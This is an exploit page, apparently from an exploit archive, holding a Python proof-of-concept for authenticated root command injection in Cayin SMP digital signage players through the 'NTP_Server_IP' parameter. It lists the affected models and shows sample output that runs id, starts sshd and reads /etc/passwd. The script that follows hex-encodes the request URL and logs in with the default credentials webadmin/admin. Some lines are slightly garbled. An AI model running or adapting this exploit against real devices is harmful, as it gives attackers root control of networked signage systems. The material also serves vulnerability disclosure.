Cayin Signage Media Player 3.0 – Remote Command Injection (root)

  • 作者: LiquidWorm
    日期: 2020-06-04
  • 类别:
  • 来源:
  • # Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
    # Author:LiquidWorm
    # Date: 2020-06-04
    # Vendor:
    # CVE:N/A
    #!/usr/bin/env python3
    # Cayin Signage Media Player 3.0 Root Remote Command Injection
    # Vendor: CAYIN Technology Co., Ltd.
    # Product web page:
    # Affected version: SMP-8000QD v3.0
    # SMP-8000 v3.0
    # SMP-6000 v3.0 Build 19025
    # SMP-6000 v1.0 Build 14246
    # SMP-6000 v1.0 Build 14199
    # SMP-6000 v1.0 Build 14167
    # SMP-6000 v1.0 Build 14097
    # SMP-6000 v1.0 Build 14090
    # SMP-6000 v1.0 Build 14069
    # SMP-6000 v1.0 Build 14062
    # SMP-4000 v1.0 Build 14098
    # SMP-4000 v1.0 Build 14092
    # SMP-4000 v1.0 Build 14087
    # SMP-2310 v3.0
    # SMP-2300 v3.0 Build 19316
    # SMP-2210 v3.0 Build 19025
    # SMP-2200 v3.0 Build 19029
    # SMP-2200 v3.0 Build 19025
    # SMP-2100 v10.0 Build 16228
    # SMP-2100 v3.0
    # SMP-2000 v1.0 Build 14167
    # SMP-2000 v1.0 Build 14087
    # SMP-1000 v1.0 Build 14099
    # SMP-PROPLUS v1.5 Build 10081
    # SMP-WEBPLUS v6.5 Build 11126
    # SMP-WEB4 v2.0 Build 13073
    # SMP-WEB4 v2.0 Build 11175
    # SMP-WEB4 v1.5 Build 11476
    # SMP-WEB4 v1.5 Build 11126
    # SMP-WEB4 v1.0 Build 10301
    # SMP-300 v1.0 Build 14177
    # SMP-200 v1.0 Build 13080
    # SMP-200 v1.0 Build 12331
    # SMP-PRO4 v1.0
    # SMP-NEO2 v1.0
    # SMP-NEO v1.0
    # Summary: CAYIN Technology provides Digital Signage
    # solutions, including media players, servers, and
    # software designed for the DOOH (Digital Out-of-home)
    # networks. We develop industrial-grade digital signage
    # appliances and tailored services so you don't have
    # to do the hard work.
    # Desc: CAYIN SMP-xxxx suffers from an authenticated
    # OS command injection vulnerability using default
    # credentials. This can be exploited to inject and
    # execute arbitrary shell commands as the root user
    # through the 'NTP_Server_IP' HTTP GET parameter in
    # system.cgi and wizard_system.cgi pages.
    # -----------------------------------------------------
    # $ ./ id
    # uid=0(root) gid=65534(guest)
    # # start sshd
    # $ ./ /mnt/libs/sshd/sbin/sshd
    # $
    # $ ./ "netstat -ant|grep ':22'"
    # tcp00* LISTEN
    # tcp00 :::22 :::*LISTEN
    # $ ./ "cat /etc/passwd"
    # root:x:0:0:root:/root:/bin/bash
    # vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
    # smbuser:x:500:0:SMB adiministrator:/opt/media:/sbin/nologin
    # sshd:x:1000:0::/dev/null:/sbin/nologin
    # $
    # -----------------------------------------------------
    # Tested on: CAYIN Technology KT-Linux v0.99
    #Apache/1.3.42 (Unix)
    #Apache/1.3.41 (Unix)
    #Linux 2.6.37
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2020-5569
    # Advisory URL:
    # 15.05.2020
    import requests
    import sys#____
    import re#_____
    if len(sys.argv) < 3:
    	print("Cayin SMP WebManager Post-Auth RCE")
    print("Usage: ./ [ip] [cmd]")
    ip____address = sys.argv[1]
    ex____command = sys.argv[2]
    ur____identif= b"\x68\x74\x74\x70\x3a\x2f\x2f"
    ur____identif += (bytes(ip____address, "utf-8"))
    ur____identif += b"\x2f\x63\x67\x69\x2d\x62\x69"
    ur____identif += b"\x6e\x2f\x77\x69\x7a\x61\x72"
    ur____identif += b"\x64\x5f\x73\x79\x73\x74\x65"
    ur____identif += b"\x6d\x2e\x63\x67\x69\x3f\x54"
    ur____identif += b"\x45\x53\x54\x5f\x4e\x54\x50"
    ur____identif += b"\x3d\x31\x26\x4e\x54\x50\x5f"
    ur____identif += b"\x53\x65\x72\x76\x65\x72\x5f"
    ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
    ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
    ur____identif += b"\x67\x25\x32\x36" ##########"
    ur____identif += (bytes(ex____command, "utf-8"))
    ur____identif += b"\x25\x32\x36" ##############"
    ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
    re____outputs ="</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")